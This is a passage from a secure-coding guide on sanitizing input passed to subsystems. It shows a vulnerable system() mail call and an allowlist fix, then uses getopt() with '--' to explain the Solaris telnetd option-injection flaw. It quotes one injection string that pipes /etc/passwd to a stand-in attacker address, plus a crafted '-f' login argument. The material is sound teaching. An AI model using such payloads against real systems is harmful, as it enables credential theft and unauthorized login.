...

Data sanitization requires an understanding of the data being passed and the capabilities of the subsystem. John Viega and Matt Messier provide an example of an application that inputs an e-mail address into a buffer and then uses this string as an argument in a call to system() [Viega 03]:

```c
/* addr is untrusted user input; nothing filters it before the shell sees it */
sprintf(buffer, "/bin/mail %s < /tmp/email", addr);
system(buffer);
```

The risk is, of course, that the user enters the following string as an e-mail address:

```text
bogus@addr.com; cat /etc/passwd  | mail some@badguy.net
```
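The following is an added example of the kind of check that stops the injection above; it is not code from Viega and Messier's book or from this rule's own compliant solution. It assumes the application only needs plain local- or domain-style addresses, so it refuses (rather than escapes) anything outside a small allowlist of characters, and the function names, the allowlist and the 254-character limit are choices made for this example:

```c
#include <stdio.h>
#include <string.h>

/* Characters permitted in an address that will be handed to a shell.
 * Assumption for this example: only plain addresses are needed, so every
 * shell metacharacter (';', '|', '<', '>', '&', '$', '`', whitespace, ...)
 * is simply absent from the set. */
static const char OK_CHARS[] =
    "abcdefghijklmnopqrstuvwxyz"
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "0123456789_-.@+";

/* Returns 1 if addr is non-empty, no longer than max_len and made only of
 * allowed characters; 0 otherwise.  strspn() stops at the first character
 * that is not in OK_CHARS, so a span equal to the whole length means
 * every byte passed the allowlist. */
int is_safe_mail_addr(const char *addr, size_t max_len) {
    size_t len = strlen(addr);
    if (len == 0 || len > max_len) return 0;
    return strspn(addr, OK_CHARS) == len;
}

/* Builds the mail command into buf only for an address that passed the
 * check.  Returns 0 on success, -1 if the address was rejected or the
 * command did not fit in buf.  The injection string from the text never
 * reaches the shell because ';', ' ', '|' and '/' are all rejected. */
int build_mail_command(char *buf, size_t buf_size, const char *addr) {
    if (!is_safe_mail_addr(addr, 254)) return -1;   /* 254: RFC address limit */
    int n = snprintf(buf, buf_size, "/bin/mail %s < /tmp/email", addr);
    if (n < 0 || (size_t)n >= buf_size) return -1;   /* truncated: refuse */
    return 0;
}

int main(void) {
    /* Constructed inputs: a benign address and the injection string above */
    const char *good = "bogus@addr.com";
    const char *bad  = "bogus@addr.com; cat /etc/passwd  | mail some@badguy.net";
    char cmd[512];

    printf("%s -> %s\n", good,
           build_mail_command(cmd, sizeof cmd, good) == 0 ? cmd : "rejected");
    printf("%s -> %s\n", bad,
           build_mail_command(cmd, sizeof cmd, bad) == 0 ? cmd : "rejected");
    return 0;
}
```

Rejecting outright is preferable to replacing bad characters, because a silently rewritten address sends the mail somewhere the user did not ask for; whichever policy is chosen, the point is that the string is checked against what the subsystem (here, a shell) can be made to do with it.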

...

This noncompliant code example is taken from [VU#881872], a vulnerability in the Sun Solaris TELNET daemon (in.telnetd) that allows a remote attacker to log on to the system with elevated privileges.

...

Because the login program uses the POSIX getopt() function to parse command-line arguments, and because the "--" (double dash) argument causes getopt() to stop interpreting options in the argument list, the USER variable cannot be used by an attacker to inject an additional command-line option. This is a valid means of sanitizing the untrusted user data in this context because, whatever the resulting string contains, getopt() can no longer interpret it as an option.
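To make the getopt() behaviour this relies on concrete, here is an added example; it is not the rule's compliant solution and not the in.telnetd or login source. It builds a login-like argument list with two hypothetical options (-p with no argument, -f taking a user name), parses it with getopt(), and compares what happens when an untrusted value that happens to start with "-" is placed directly after the options versus after a "--" terminator. The option letters, the function names and the constructed untrusted value "-fotheruser" are assumptions of the example:

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* What a getopt() pass over one argv saw. */
struct parse_result {
    int saw_f;             /* -f <name> was recognised as an option */
    int saw_p;             /* -p was recognised as an option */
    char fname[64];        /* argument attached to -f, if any */
    int first_operand;     /* optind when getopt() returned -1 */
    const char *operand;   /* argv[first_operand], or NULL if none */
};

/* Parse argv with the hypothetical option string "f:p" (-f takes an
 * argument, -p does not).  getopt() keeps global state, so optind is reset
 * before every call; opterr = 0 silences its diagnostics. */
static struct parse_result parse_login_args(int argc, char *argv[]) {
    struct parse_result r;
    int c;

    memset(&r, 0, sizeof r);
    optind = 1;
    opterr = 0;
    while ((c = getopt(argc, argv, "f:p")) != -1) {
        switch (c) {
        case 'f':
            r.saw_f = 1;
            snprintf(r.fname, sizeof r.fname, "%s", optarg);
            break;
        case 'p':
            r.saw_p = 1;
            break;
        default:       /* unknown option letter: ignored in this example */
            break;
        }
    }
    r.first_operand = optind;
    r.operand = (optind < argc) ? argv[optind] : NULL;
    return r;
}

/* Unsafe layout: { "login", "-p", <untrusted> }.  getopt() is still
 * scanning for options when it reaches the untrusted element, so a value
 * beginning with '-' is parsed as one. */
struct parse_result run_without_terminator(const char *untrusted) {
    char *argv[] = { "login", "-p", (char *)untrusted, NULL };
    return parse_login_args(3, argv);
}

/* Sanitized layout: { "login", "-p", "--", <untrusted> }.  getopt() stops
 * at "--" and returns -1 with optind just past it, so the untrusted element
 * is an operand no matter what it starts with. */
struct parse_result run_with_terminator(const char *untrusted) {
    char *argv[] = { "login", "-p", "--", (char *)untrusted, NULL };
    return parse_login_args(4, argv);
}

int main(void) {
    const char *evil = "-fotheruser";   /* constructed untrusted USER value */
    struct parse_result a = run_without_terminator(evil);
    struct parse_result b = run_with_terminator(evil);

    printf("without --: saw_f=%d fname=\"%s\" operand=%s\n",
           a.saw_f, a.fname, a.operand ? a.operand : "(none)");
    printf("with    --: saw_f=%d fname=\"%s\" operand=%s\n",
           b.saw_f, b.fname, b.operand ? b.operand : "(none)");
    return 0;
}
```

In the first layout getopt() accepts "-fotheruser" as -f with the attached argument "otheruser"; in the second it never looks at the element at all, which is exactly why inserting "--" sanitizes the value in this context without having to inspect or rewrite it.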

...